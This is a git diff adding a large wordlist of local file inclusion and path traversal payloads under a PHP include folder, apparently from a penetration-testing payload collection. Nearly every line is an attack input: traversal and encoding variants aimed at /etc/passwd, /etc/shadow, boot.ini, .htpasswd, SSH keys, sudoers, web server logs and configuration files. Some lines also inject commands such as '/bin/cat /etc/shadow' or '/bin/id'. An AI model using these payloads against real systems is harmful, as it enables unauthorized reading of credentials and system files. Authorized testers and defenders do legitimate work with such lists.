diff --git a/PHP include/JHADDIX_LFI.txt b/PHP include/JHADDIX_LFI.txt
new file mode 100644
index 0000000..6f10e3f
--- /dev/null
+++ b/PHP include/JHADDIX_LFI.txt
@@ -0,0 +1,867 @@ +/.../.../.../.../.../ +\…..\\\…..\\\…..\\\ +%00../../../../../../etc/passwd +%00/etc/passwd%00 +%00../../../../../../etc/shadow +%00/etc/shadow%00 +%0a/bin/cat%20/etc/passwd +%0a/bin/cat%20/etc/shadow +/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini +/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini +/../../../../../../../../%2A +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow +..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd +..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow +..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed +..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd +..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow +=3D “/..” . “%2f.. 
+..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini +admin/access_log +/admin/install.php +../../../administrator/inbox +/apache2/logs/access_log +/apache2/logs/access.log +/apache2/logs/error_log +/apache2/logs/error.log +/apache/logs/access_log +/apache/logs/access.log +../../../../../apache/logs/access.log +../../../../apache/logs/access.log +../../../apache/logs/access.log +../../apache/logs/access.log +../apache/logs/access.log +/apache/logs/error_log +/apache/logs/error.log +../../../../../apache/logs/error.log +../../../../apache/logs/error.log +../../../apache/logs/error.log +../../apache/logs/error.log +../apache/logs/error.log +/apache\php\php.ini +\\'/bin/cat%20/etc/passwd\\' +\\'/bin/cat%20/etc/shadow\\' +/.bash_history +/.bash_profile +/.bashrc +/../../../../../../../../bin/id| +/bin/php.ini +/boot/grub/grub.conf +/./././././././././././boot.ini +/../../../../../../../../../../../boot.ini +/..\../..\../..\../..\../..\../..\../boot.ini +/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini +..//..//..//..//..//boot.ini +../../../../../../../../../../../../boot.ini +../../boot.ini +..\../..\../..\../..\../boot.ini +..\../..\../boot.ini +..\..\..\..\..\..\..\..\..\..\boot.ini +\..\..\..\..\..\..\..\..\..\..\boot.ini +/../../../../../../../../../../../boot.ini%00 +../../../../../../../../../../../../boot.ini%00 +..\..\..\..\..\..\..\..\..\..\boot.ini%00 +/../../../../../../../../../../../boot.ini%00.html +/../../../../../../../../../../../boot.ini%00.jpg +/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd +..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow +c:\apache\logs\access.log +c:\apache\logs\error.log +c:\AppServ\MySQL +C:/boot.ini +C:\boot.ini +/C:/inetpub/ftproot/ +C:/inetpub/wwwroot/global.asa +C:\inetpub\wwwroot\global.asa +c:\inetpub\wwwroot\index.asp +/config.asp 
+../config.asp +config.asp +../config.inc.php +config.inc.php +../config.js +config.js +_config.php +../_config.php +../config.php +config.php +../_config.php%00 +../../../../../../../../conf/server.xml +/core/config.php +/C:\Program Files\ +c:\Program Files\Apache Group\Apache\logs\access.log +c:\Program Files\Apache Group\Apache\logs\error.log +/.cshrc +c:\System32\Inetsrv\metabase.xml +c:WINDOWS/system32/ +d:\AppServ\MySQL +database.asp +database.js +database.php +data.php +dbase.php a +db.php +../../../../../../../dev +/D:\Program Files\ +d:\System32\Inetsrv\metabase.xml +/etc/apache2/apache2.conf +/etc/apache2/conf/httpd.conf +/etc/apache2/httpd.conf +/etc/apache2/sites-available/default +/etc/apache2/vhosts.d/default_vhost.include +/etc/apache/apache.conf +/etc/apache/conf/httpd.conf +/etc/apache/httpd.conf +/etc/apt/sources.list +/etc/chrootUsers +/etc/crontab +/etc/defaultdomain +/etc/default/passwd +/etc/defaultrouter +/etc/fstab +/etc/ftpchroot +/etc/ftphosts +/etc/group +/etc/hostname.bge +/etc/hostname.ce0 +/etc/hostname.ce1 +/etc/hostname.ce2 +/etc/hostname.ce3 +/etc/hostname.dcelx0 +/etc/hostname.dcelx1 +/etc/hostname.dcelx2 +/etc/hostname.dcelx3 +/etc/hostname.dmfe0 +/etc/hostname.dmfe1 +/etc/hostname.dmfe2 +/etc/hostname.dmfe3 +/etc/hostname.dnet0 +/etc/hostname.dnet1 +/etc/hostname.dnet2 +/etc/hostname.dnet3 +/etc/hostname.ecn0 +/etc/hostname.ecn1 +/etc/hostname.ecn2 +/etc/hostname.ecn3 +/etc/hostname.elx0 +/etc/hostname.elx1 +/etc/hostname.elx2 +/etc/hostname.elx3 +/etc/hostname.elxl0 +/etc/hostname.elxl1 +/etc/hostname.elxl2 +/etc/hostname.elxl3 +/etc/hostname.eri0 +/etc/hostname.eri1 +/etc/hostname.eri2 +/etc/hostname.eri3 +/etc/hostname.ge0 +/etc/hostname.ge1 +/etc/hostname.ge2 +/etc/hostname.ge3 +/etc/hostname.hme0 +/etc/hostname.hme1 +/etc/hostname.hme2 +/etc/hostname.hme3 +/etc/hostname.ieef0 +/etc/hostname.ieef1 +/etc/hostname.ieef2 +/etc/hostname.ieef3 +/etc/hostname.iprb0 +/etc/hostname.iprb1 +/etc/hostname.iprb2 +/etc/hostname.iprb3 
+/etc/hostname.le0 +/etc/hostname.le1 +/etc/hostname.le2 +/etc/hostname.le3 +/etc/hostname.lo +/etc/hostname.pcn0 +/etc/hostname.pcn1 +/etc/hostname.pcn2 +/etc/hostname.pcn3 +/etc/hostname.qfe0 +/etc/hostname.qfe1 +/etc/hostname.qfe2 +/etc/hostname.qfe3 +/etc/hostname.spwr0 +/etc/hostname.spwr1 +/etc/hostname.spwr2 +/etc/hostname.spwr3 +/etc/hosts +../../../../../../../../../../../../etc/hosts +../../../../../../../../../../../../etc/hosts%00 +/etc/hosts.allow +/etc/hosts.deny +/etc/hosts.equiv +/etc/http/conf/httpd.conf +/etc/httpd.conf +/etc/httpd/conf.d/php.conf +/etc/httpd/conf.d/squirrelmail.conf +/etc/httpd/conf.d/ssl.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/httpd/logs/acces_log +/etc/httpd/logs/acces.log +../../../../../../../etc/httpd/logs/acces_log +../../../../../../../etc/httpd/logs/acces.log +/etc/httpd/logs/access_log +/etc/httpd/logs/access.log +../../../../../etc/httpd/logs/access_log +../../../../../etc/httpd/logs/access.log +/etc/httpd/logs/error_log +/etc/httpd/logs/error.log +../../../../../../../etc/httpd/logs/error_log +../../../../../../../etc/httpd/logs/error.log +../../../../../etc/httpd/logs/error_log +../../../../../etc/httpd/logs/error.log +/etc/httpd/php.ini +/etc/http/httpd.conf +/etc/inetd.conf +/etc/init.d/apache +/etc/init.d/apache2 +/etc/issue +/etc/logrotate.d/ftp +/etc/logrotate.d/httpd +/etc/logrotate.d/proftpd +/etc/logrotate.d/vsftpd.log +/etc/mail/access +/etc/mailman/mm_cfg.py +/etc/make.conf +/etc/master.passwd +/etc/motd +/etc/my.cnf +/etc/mysql/my.cnf +/etc/netconfig +/etc/nsswitch.conf +/etc/opt/ipf/ipf.conf +/etc/opt/ipf/ipnat.conf +/./././././././././././etc/passwd +/../../../../../../../../../../etc/passwd +/../../../../../../../../../../etc/passwd^^ +/..\../..\../..\../..\../..\../..\../etc/passwd +/etc/passwd +../../../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../../../etc/passwd 
+../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../etc/passwd +../../../../../../../../../../etc/passwd +../../../../../../../../../etc/passwd +../../../../../../../../etc/passwd +../../../../../../../etc/passwd +../../../../../../etc/passwd +../../../../../etc/passwd +../../../../etc/passwd +../../../etc/passwd +../../etc/passwd +../etc/passwd +..\..\..\..\..\..\..\..\..\..\etc\passwd +.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd +\..\..\..\..\..\..\..\..\..\..\etc\passwd +etc/passwd +/etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../etc/passwd%00 +../../../../../../../../../etc/passwd%00 +../../../../../../../../etc/passwd%00 +../../../../../../../etc/passwd%00 +../../../../../../etc/passwd%00 
+../../../../../etc/passwd%00 +../../../../etc/passwd%00 +../../../etc/passwd%00 +../../etc/passwd%00 +../etc/passwd%00 +..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +/../../../../../../../../../../../etc/passwd%00.html +/../../../../../../../../../../../etc/passwd%00.jpg +../../../../../../etc/passwd&=%3C%3C%3C%3C +/etc/php4.4/fcgi/php.ini +/etc/php4/apache2/php.ini +/etc/php4/apache/php.ini +/etc/php4/cgi/php.ini +/etc/php5/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php5/cgi/php.ini +/etc/php/apache2/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.d/dom.ini +/etc/php.d/gd.ini +/etc/php.d/imap.ini +/etc/php.d/json.ini +/etc/php.d/ldap.ini +/etc/php.d/mbstring.ini +/etc/php.d/mysqli.ini +/etc/php.d/mysql.ini +/etc/php.d/odbc.ini +/etc/php.d/pdo.ini +/etc/php.d/pdo_mysql.ini +/etc/php.d/pdo_odbc.ini +/etc/php.d/pdo_pgsql.ini +/etc/php.d/pdo_sqlite.ini +/etc/php.d/pgsql.ini +/etc/php.d/xmlreader.ini +/etc/php.d/xmlwriter.ini +/etc/php.d/xsl.ini +/etc/php.d/zip.ini +/etc/php.ini +/etc/php/php4/php.ini +/etc/php/php.ini +/etc/postfix/mydomains +/etc/proftp.conf +/etc/proftpd/modules.conf +/etc/protpd/proftpd.conf +/etc/pure-ftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/pureftpd.pdb +/etc/release +/etc/resolv.conf +/etc/rpc +/etc/security/environ +/etc/security/failedlogin +/etc/security/group +/etc/security/lastlog +/etc/security/limits +/etc/security/passwd +/etc/security/user +/./././././././././././etc/shadow +/../../../../../../../../../../etc/shadow +/../../../../../../../../../../etc/shadow^^ +/..\../..\../..\../..\../..\../..\../etc/shadow +/etc/shadow +../../../../../../../../../../../../etc/shadow +..\..\..\..\..\..\..\..\..\..\etc\shadow +.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow +\..\..\..\..\..\..\..\..\..\..\etc\shadow +../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 
+../../../../../../../../../../../../etc/shadow%00 +..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +etc/shadow%00 +/etc/ssh/sshd_config +/etc/sudoers +/etc/syslog.conf +/etc/syslogd.conf +/etc/system +/etc/updatedb.conf +/etc/utmp +/etc/vfstab +/etc/vhcs2/proftpd/proftpd.conf +/etc/vsftpd.chroot_list +/etc/vsftpd.conf +/etc/vsftpd/vsftpd.conf +/etc/wtmp +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/.forward +/home2\bin\stable\apache\php.ini +/home/apache/conf/httpd.conf +/home/apache/httpd.conf +/home\bin\stable\apache\php.ini +/.htpasswd +.htpasswd +../.htpasswd +../install.php +install.php +../../../../../../../../../../../../localstart.asp +../../../../../../../../../../../../localstart.asp%00 +/log/miscDir/accesslog +/.logout +/logs/access_log +/logs/access.log +../../../../../logs/access.log +../../../../logs/access.log +../../../logs/access.log +../../logs/access.log +../logs/access.log +/logs/error_log +/logs/error.log +../../../../../logs/error.log +../../../../logs/error.log +../../../logs/error.log +../../logs/error.log +../logs/error.log +/logs/pure-ftpd.log +/master.passwd +member/.htpasswd +members/.htpasswd +/.netrc +/NetServer\bin\stable\apache\php.ini +/opt/apache2/conf/httpd.conf +/opt/apache/conf/httpd.conf +/opt/lampp/logs/access_log +/opt/lampp/logs/access.log +/opt/lampp/logs/error_log +/opt/lampp/logs/error.log +/opt/xampp/etc/php.ini +/opt/xampp/logs/access_log +/opt/xampp/logs/access.log +/opt/xampp/logs/error_log +/opt/xampp/logs/error.log +.pass +../.pass +pass.dat +passwd +/.passwd +.passwd +../.passwd +passwd.dat +/php4\php.ini +/php5\php.ini +/php\php.ini +/PHP\php.ini +/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf.default +/proc/cpuinfo +/proc/interrupts +/proc/loadavg +/proc/meminfo +/proc/mounts +/proc/net/arp +/proc/net/dev +/proc/net/route +/proc/net/tcp +/proc/partitions +/proc/self/cmdline +/proc/self/envron +/proc/version +/.profile +/Program 
Files\Apache Group\Apache2\conf\httpd.conf +/Program Files\Apache Group\Apache\conf\httpd.conf +/Program Files\Apache Group\Apache\logs\access.log +/Program Files\Apache Group\Apache\logs\error.log +/Program Files\xampp\apache\conf\httpd.conf +/../../../../pswd +/.rhosts +/root/.bash_history +/root/.bash_logut +root/.htpasswd +/root/.ksh_history +/root/.Xauthority +/.sh_history +/.shosts +/.ssh/authorized_keys +user/.htpasswd +../users.db.php +users.db.php +users/.htpasswd +/usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf +/usr/etc/pure-ftpd.conf +/usr/lib/cron/log +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/lib/security/mkuser.default +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/httpd.conf +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error.log +/usr/local/apache/conf/httpd.conf +/usr/local/apache/conf/php.ini +/usr/local/apache/httpd.conf +/usr/local/apache/log +/usr/local/apache/logs +/usr/local/apache/logs/access_log +/usr/local/apache/logs/access_ log +/usr/local/apache/logs/access.log +/usr/local/apache/logs/access. log +../../../../../../../usr/local/apache/logs/access_ log +../../../../../../../usr/local/apache/logs/access. 
log +../../../../../usr/local/apache/logs/access_log +../../../../../usr/local/apache/logs/access.log +/usr/local/apache/logs/error_log +/usr/local/apache/logs/error.log +../../../../../../../usr/local/apache/logs/error_l og +../../../../../../../usr/local/apache/logs/error.l og +../../../../../usr/local/apache/logs/error_log +../../../../../usr/local/apache/logs/error.log +/usr/local/apps/apache2/conf/httpd.conf +/usr/local/apps/apache/conf/httpd.conf +/usr/local/cpanel/logs +/usr/local/cpanel/logs/access_log +/usr/local/cpanel/logs/error_log +/usr/local/cpanel/logs/license_log +/usr/local/cpanel/logs/login_log +/usr/local/cpanel/logs/stats_log +/usr/local/etc/apache2/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/vhosts.conf +/usr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/httpd/logs/access_log +/usr/local/etc/httpd/logs/error_log +/usr/local/etc/php.ini +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/httpd/conf/httpd.conf +/usr/local/lib/php.ini +/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf.php +/usr/local/php4/lib/php.ini +/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf.php +/usr/local/php5/lib/php.ini +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini +/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pureftpd.pdb +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/www/logs/thttpd_log +/usr/local/Zend/etc/php.ini +/usr/pkgsrc/net/pureftpd/ +/usr/ports/contrib/pure-ftpd/ +/usr/ports/ftp/pure-ftpd/ +/usr/ports/net/pure-ftpd/ +/usr/sbin/pure-config.pl +/usr/spool/lp/log +/usr/spool/mqueue/syslog +/var/adm +/var/adm/acct/sum/loginlog +/var/adm/aculog +/var/adm/aculogs +/var/adm/crash/unix +/var/adm/crash/vmcore +/var/adm/cron/log +/var/adm/dtmp +/var/adm/lastlog +/var/adm/lastlog/username +/var/adm/log/asppp.log +/var/adm/loginlog +/var/adm/log/xferlog +/var/adm/lp/lpd-errs +/var/adm/messages +/var/adm/pacct +/var/adm/qacct 
+/var/adm/ras/bootlog +/var/adm/ras/errlog +/var/adm/sulog +/var/adm/SYSLOG +/var/adm/utmp +/var/adm/utmpx +/var/adm/vold.log +/var/adm/wtmp +/var/adm/wtmpx +/var/adm/X0msgs +/var/apache/log +/var/apache/logs +/var/apache/logs/access_log +/var/apache/logs/error_log +/var/cpanel/cpanel.config +/var/cron/log +/var/lib/mlocate/mlocate.db +/var/lib/mysql/my.cnf +/var/local/www/conf/php.ini +/var/lock/samba +/var/log +/var/log/access_log +/var/log/access.log +../../../../../../../var/log/access_log +../../../../../../../var/log/access.log +../../../../../var/log/access_log +/var/log/acct +/var/log/apache2/access_log +/var/log/apache2/access.log +../../../../../../../var/log/apache2/access_log +../../../../../../../var/log/apache2/access.log +/var/log/apache2/error_log +/var/log/apache2/error.log +../../../../../../../var/log/apache2/error_log +../../../../../../../var/log/apache2/error.log +/var/log/apache/access_log +/var/log/apache/access.log +../../../../../../../var/log/apache/access_log +../../../../../../../var/log/apache/access.log +../../../../../var/log/apache/access_log +../../../../../var/log/apache/access.log +/var/log/apache/error_log +/var/log/apache/error.log +../../../../../../../var/log/apache/error_log +../../../../../../../var/log/apache/error.log +../../../../../var/log/apache/error_log +../../../../../var/log/apache/error.log +/var/log/apache-ssl/access.log +/var/log/apache-ssl/error.log +/var/log/auth +/var/log/authlog +/var/log/auth.log +/var/log/boot.log +/var/log/cron.log +/var/log/dmesg +/var/log/error_log +/var/log/error.log +../../../../../../../var/log/error_log +../../../../../../../var/log/error.log +../../../../../var/log/error_log +/var/log/exim_mainlog +/var/log/exim/mainlog +/var/log/exim_paniclog +/var/log/exim/paniclog +/var/log/exim_rejectlog +/var/log/exim/rejectlog +/var/log/ftplog +/var/log/ftp-proxy +/var/log/ftp-proxy/ftp-proxy.log +/var/log/httpd/ +/var/log/httpd/access_log +/var/log/httpd/access.log 
+../../../../../var/log/httpd/access_log +/var/log/httpd/error_log +/var/log/httpd/error.log +../../../../../var/log/httpd/error_log +/var/log/httpsd/ssl.access_log +/var/log/httpsd/ssl_log +/var/log/kern.log +/var/log/lastlog +/var/log/lighttpd +/var/log/maillog +/var/log/message +/var/log/messages +/var/log/mysqlderror.log +/var/log/mysqld.log +/var/log/mysql.log +/var/log/mysql/mysql-bin.log +/var/log/mysql/mysql.log +/var/log/mysql/mysql-slow.log +/var/log/ncftpd.errs +/var/log/ncftpd/misclog.txt +/var/log/news +/var/log/news.all +/var/log/news/news +/var/log/news/news.all +/var/log/news/news.crit +/var/log/news/news.err +/var/log/news/news.notice +/var/log/news/suck.err +/var/log/news/suck.notice +/var/log/poplog +/var/log/POPlog +/var/log/proftpd +/var/log/proftpd.access_log +/var/log/proftpd.xferlog +/var/log/proftpd/xferlog.legacy +/var/log/pureftpd.log +/var/log/pure-ftpd/pure-ftpd.log +/var/log/qmail +/var/log/qmail/ +/var/log/samba +/var/log/samba-log.%m +/var/log/secure +/var/log/smtpd +/var/log/spooler +/var/log/syslog +/var/log/telnetd +/var/log/thttpd_log +/var/log/utmp +/var/log/vsftpd.log +/var/log/wtmp +/var/log/xferlog +/var/log/yum.log +/var/lp/logs/lpNet +/var/lp/logs/lpsched +/var/lp/logs/requests +/var/mysql.log +/var/run/httpd.pid +/var/run/mysqld/mysqld.pid +/var/run/utmp +/var/saf/_log +/var/saf/port/log +/var/spool/errors +/var/spool/locks +/var/spool/logs +/var/spool/tmp +/var/www/conf/httpd.conf +/var/www/html/.htaccess +/var/www/localhost/htdocs/.htaccess +/var/www/log/access_log +/var/www/log/error_log +/../../var/www/logs/access_log +/var/www/logs/access_log +/var/www/logs/access.log +../../../../../../../var/www/logs/access_log +../../../../../../../var/www/logs/access.log +../../../../../var/www/logs/access.log +/var/www/logs/error_log +/var/www/logs/error.log +../../../../../../../var/www/logs/error_log +../../../../../../../var/www/logs/error.log +../../../../../var/www/logs/error_log +../../../../../var/www/logs/error.log 
+/var/www/sitename/htdocs/ +/var/www/vhosts/sitename/httpdocs/.htaccess +/var/www/web1/html/.htaccess +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf +/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/webBackup/opt/apache2/conf/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.default +/web/conf/php.ini +/WINDOWS\php.ini +../../windows/win.ini +/WINNT\php.ini +/..\..\..\..\..\..\winnt\win.ini +/www/logs/proftpd.system.log +/xampp\apache\bin\php.ini +/.Xauthority +..2fapache2flogs2ferror.log +..2fapache2flogs2faccess.log +..2f..2fapache2flogs2ferror.log +..2f..2fapache2flogs2faccess.log +..2f..2f..2fapache2flogs2ferror.log +..2f..2f..2fapache2flogs2faccess.log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. 
log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log +..2fetc2fpasswd +..2fetc2fpasswd%00 +..2f..2fetc2fpasswd +..2f..2fetc2fpasswd%00 +..2f..2f..2fetc2fpasswd +..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 
+..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00 +L2V0Yy9tYXN0ZXIucGFzc3dk +L21hc3Rlci5wYXNzd2Q= +ZXRjL3Bhc3N3ZA== +ZXRjL3NoYWRvdyUwMA== 